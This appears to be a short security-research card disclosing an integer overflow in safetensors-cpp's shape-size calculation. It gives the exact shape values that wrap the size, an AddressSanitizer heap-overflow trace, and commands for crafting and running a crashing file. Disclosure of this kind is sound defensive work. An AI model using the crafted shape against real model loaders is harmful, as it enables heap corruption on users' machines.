metadata
tags:
- safetensors
- security-research
SafeTensors C++ Integer Overflow PoC
Security Research - Responsible Disclosure via huntr
Vulnerability
safetensors-cpp get_shape_size() multiplies shape dimensions without overflow checking.
The Rust reference implementation uses checked_mul and rejects overflow.
Shape [4194305, 4194305, 211106198978564] overflows uint64 to 4.
Parser allocates 16 bytes, consumer iterates 4194305+ elements -> heap overflow.
ASan Result
AddressSanitizer: heap-buffer-overflow WRITE of size 4
0x6020000001a0 is located 0 bytes after 16-byte region
Reproduction
python3 craft_overflow.py
g++ -std=c++17 -DSAFETENSORS_CPP_IMPLEMENTATION -fsanitize=address -I safetensors-cpp -o crash crash_overflow.cc
./crash overflow_tensor.safetensors